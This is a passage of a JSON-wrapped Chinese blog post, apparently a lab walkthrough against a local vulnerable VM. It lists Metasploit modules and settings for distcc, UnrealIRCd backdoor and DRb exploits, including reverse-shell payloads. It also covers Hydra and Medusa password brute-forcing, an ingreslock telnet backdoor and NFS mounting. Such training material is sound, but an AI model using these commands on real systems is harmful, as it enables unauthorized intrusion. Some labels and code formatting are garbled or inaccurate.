192.168.207.140<\/code>\u663e\u793a\u5f53\u524d\u7aef\u53e3\u670d\u52a1\u540d\u4e3aingreslock<\/p>\n<p>\u800c<code>ingreslock<\/code>\u662f\u4e00\u4e2a\u65e9\u671f\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6f0f\u6d1e\uff0c\u5b83\u53ef\u80fd\u5bfc\u81f4\u5f88\u4e25\u91cd\u7684\u5b89\u5168\u95ee\u9898<\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>Telnet\u8fde\u63a5<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528Telnet\u8fde\u63a5<\/strong><\/p>\n<pre><code>telnet 192.168.207.140 1524<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134308356.png\" alt=\"image-20231008134308356\" \/><\/p>\n<h3>nfs\u6587\u4ef6\u5171\u4eab\u6f0f\u6d1e<\/h3>\n<p>\u4f7f\u7528\u547d\u4ee4\u67e5\u770b\u6587\u4ef6\u5171\u4eab\u60c5\u51b5\uff1a<code>showmount -e 192.168.207.140<\/code><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134334765.png\" alt=\"image-20231008134334765\" \/><\/p>\n<p>\u6240\u6709\u6587\u4ef6\u5171\u4eab<\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>mount\u8fdb\u884c\u5171\u4eab<\/li>\n<\/ol>\n<p><strong>\u5f00\u59cb\u5229\u7528<\/strong><\/p>\n<pre><code>mkdir \/temp\/\uff1a\u5728\u653b\u51fb\u673a\u7684\u6839\u76ee\u5f55\u521b\u5efatemp\u6587\u4ef6\u5939`\n `mount -t 192.168.207.140:\/ .\/temp -o nolock\uff1a\u5c06temp\u4e0e\u76ee\u6807\u673a\u5171\u4eab`\n `cd \/temp\uff1a\u8fdb\u5165\u5171\u4eab\u6587\u4ef6\u5939`\n `ll\uff1a\u67e5\u770b\u6240\u6709\u6587\u4ef6\u4ee5\u53ca\u76ee\u5f55<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134743762.png\" alt=\"image-20231008134743762\" \/><\/p>\n<h3>ftp\u5f31\u53e3\u4ee4<\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search ftp_login\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use scanner\/ftp\/ftp_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `set rport 2121\uff1a\u8bbe\u7f6e\u76ee\u6807\u673a\u7aef\u53e3\uff08\u7531\u4e8e\u8be5ftp\u670d\u52a1\u5f00\u542f\u7684\u4e3a2121\u7aef\u53e3\uff0c\u6240\u4ee5\u9700\u8981\u4fee\u6539\u7aef\u53e3\uff09`\n `set userpass_file \/usr\/local\/my-files\/pass-notebook\/123.txt\uff08\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0c\u8d26\u5bc6\u683c\u5f0f\u4e3a\uff09<\/code><\/pre>\n<blockquote>\n<p>USERNAME1 PASSWORD1<br \/>\nUSERNAME2 PASSWORD2<br \/>\nUSERNAME3 PASSWORD3<br \/>\n\u2026 \u2026<\/p>\n<\/blockquote>\n<pre><code>run\uff1a\u8fd0\u884c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134937316.png\" alt=\"image-20231008134937316\" \/><\/p>\n<h3>MySQL\u5f31\u53e3\u4ee4<\/h3>\n<p>\u5229\u7528\u65b9\u5f0f<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search mysql\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use scanner\/mysql\/mysql_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c\n \u6ca1\u6709\u5bc6\u7801\uff0c\u8f93\u5165root\u53ef\u4ee5\u76f4\u63a5\u767b\u5f55<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135046661.png\" alt=\"image-20231008135046661\" \/><\/p>\n<h3>Distccd\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/h3>\n<p>\u4f7f\u7528<code>db_nmap<\/code>\u626b\u63cf\u8be5\u7aef\u53e3<\/p>\n<p><code>db_nmap --script=vuln -p 3632 192.168.207.140<\/code>\u63d0\u793a\u5f53\u524d\u7aef\u53e3\u5b58\u5728\u4e00\u4e2aCVE\u6f0f\u6d1e\u3002<\/p>\n<p>\u6f0f\u6d1e\u7f16\u53f7\uff1a<code>cve-2004-2687<\/code><\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search distcc\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/unix\/misc\/distcc_exec\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `set payload cmd\/unix\/reverse\uff1a\u8bbe\u7f6e\u653b\u51fb\u8f7d\u8377`\n `run\uff1a\u8fd0\u884c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135146251.png\" alt=\"image-20231008135146251\" \/><\/p>\n<h3>Postgresql\u5f31\u53e3\u4ee4<\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<li>Hydra\u7206\u7834<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search postgres\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use scanner\/postgres\/postgres_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c\uff08\u81ea\u5e26\u8d26\u53f7\u5bc6\u7801\u672c\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u989d\u5916\u8bbe\u7f6e\uff09<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135228268.png\" alt=\"image-20231008135228268\" \/><\/p>\n<p><strong>Hydra\u7206\u7834<\/strong><\/p>\n<p>\u4f7f\u7528\u547d\u4ee4\uff1a<code>hydra -L \u7528\u6237\u540d\u5b57\u5178 -P \u5bc6\u7801\u5b57\u5178 192.168.207.140 postgres -s 5432 -t 8<\/code><\/p>\n<h3>vnc\u5f31\u53e3\u4ee4<\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<li>Medusa\u7206\u7834<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search vnc_login\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use scanner\/vnc\/vnc_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c\uff08\u81ea\u5e26\u8d26\u53f7\u5bc6\u7801\u672c\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u989d\u5916\u8bbe\u7f6e\uff09<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135322954.png\" alt=\"image-20231008135322954\" \/><\/p>\n<p><strong>Medusa\u7206\u7834<\/strong><\/p>\n<p>\u4f7f\u7528\u547d\u4ee4\uff1a<code>medusa -h 192.168.207.140 -U user.txt -P pass.txt -M vnc -t 4<\/code><\/p>\n<h3>UnrealIRCd\u6f0f\u6d1e<\/h3>\n<p>UnrealIRCd \u66fe\u7ecf\u5b58\u5728\u4e25\u91cd\u7684\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u548c\u83b7\u53d6\u7cfb\u7edf\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<p>\u5176\u4e2d\uff0c\u6700\u77e5\u540d\u7684\u662f UnrealIRCd 3.2.8.1 \u7248\u672c\u7684\u201c\u5e7d\u7075\u6f0f\u6d1e\u201d\uff08Ghost Vulnerability\uff09\uff0c\u4e5f\u88ab\u7f16\u53f7\u4e3a<code>CVE-2010-2075<\/code>\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u7279\u5b9a\u7684\u6076\u610f\u8bf7\u6c42\u5728\u76ee\u6807\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u4ece\u800c\u83b7\u5f97\u670d\u52a1\u5668\u7684\u63a7\u5236\u6743\u3002\u8be5\u6f0f\u6d1e\u66fe\u5e7f\u6cdb\u88ab\u5229\u7528\u3002<\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search ircd\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/unix\/irc\/unreal_ircd_3281_backdoor\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `set lhost 192.168.207.1\uff1a\u8bbe\u7f6e\u653b\u51fb\u673aIP`\n `set payload cmd\/unix\/reverse\uff1a\u8bbe\u7f6e\u653b\u51fb\u8f7d\u8377`\n `run\uff1a\u8fd0\u884c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135529393.png\" alt=\"image-20231008135529393\" \/><\/p>\n<h3>tomcat\u5f31\u53e3\u4ee4<\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<li>Hydra\u7206\u7834<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search tomcat\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use auxiliary\/scanner\/http\/tomcat_mgr_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `set rport 8180\uff1a\u8bbe\u7f6e\u7aef\u53e3\uff08\u56e0\u4e3a\u4e0d\u662f\u9ed8\u8ba4\u76848080\uff0c\u6240\u4ee5\u9700\u8981\u8bbe\u7f6e8180\uff09`\n `run\uff1a\u8fd0\u884c\uff08\u81ea\u5e26\u8d26\u53f7\u5bc6\u7801\u672c\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u989d\u5916\u8bbe\u7f6e\uff09<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135620323.png\" alt=\"image-20231008135620323\" \/><\/p>\n<p><strong>Hydra\u7206\u7834<\/strong><\/p>\n<p>\u4f7f\u7528\u547d\u4ee4\uff1a<code>hydra -L user.txt -P pass.txt 192.168.207.140 -s 8180 http-get \/manager\/html<\/code><\/p>\n<h3><strong>6667\u7aef\u53e36697 IRC\u670d\u52a1\uff0c IRC\u670d\u52a1\u8fd9\u4e2a\u7248\u672c\u5b58\u5728\u540e\u95e8\u6f0f\u6d1e\uff0c\u76f4\u63a5exp\u540egetshell<\/strong><\/h3>\n<p>\u4f7f\u7528\u6a21\u5757\uff1a<code>use exploit\/unix\/irc\/unreal_ircd_3281_backdoor<\/code><\/p>\n<h3><em>8787\u7aef\u53e3drb\u670d\u52a1\uff0c\u6709\u4e2a\u8fdc\u7a0bsa\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/em><\/h3>\n<p>\u4f7f\u7528\u6a21\u5757\uff1a<code>use exploit\/linux\/misc\/drb_remote_codeexec<\/code><\/p>\n<h3>512\u7aef\u53e3 exec<\/h3>\n<p>Distcc \u7528\u4e8e\u5927\u91cf\u4ee3\u7801\u5728\u7f51\u7edc\u670d\u52a1\u5668\u4e0a\u7684\u5206\u5e03\u5f0f\u7f16\u8bd1\uff0c\u4f46\u662f\u5982\u679c\u914d\u7f6e\u4e0d\u4e25\u683c\uff0c\u5bb9\u6613\u88ab\u6ee5\u7528\u6267\u884c\u547d\u4ee4\uff0c\u8be5\u6f0f\u6d1e\u662f xcode1.5 \u7248\u672c\u53ca\u5176\u4ed6\u7248\u672c\u7684 distcc2.x \u7248\u672c\u914d\u7f6e\u5bf9\u4e8e\u670d\u52a1\u5668\u7aef\u53e3\u7684\u8bbf\u95ee\u4e0d\u9650\u5236\u3002<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008135825940.png\" alt=\"image-20231008135825940\" \/><\/p>\n<blockquote>\n<p>\u5982\u6709\u4fb5\u6743\uff0c\u8bf7\u5373\u4f7f\u544a\u77e5<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u4fe1\u606f\u6536\u96c6\u9636\u6bb5 \u7531\u4e8e\u662fVmware\u4e2d\u7684\u9776\u673a\uff0c\u6240\u4ee5\u4e0d\u505a\u771f\u5b9eIP\u3001\u65c1\u7ad9\u3001C\u6bb5\u3001WAF\u7b49\u4fe1\u606f\u7684\u6536\u96c6 \u7aef\u53e3\u6536\u96c6\uff1a \u83b7\u5f97\u5f00\u653e\u7684\u670d\u52a1\u4fe1\u606f\uff1a St &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-333","post","type-post","status-publish","format-standard","hentry","category-9"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=333"}],"version-history":[{"count":2,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions"}],"predecessor-version":[{"id":336,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions\/336"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=333"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=333"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}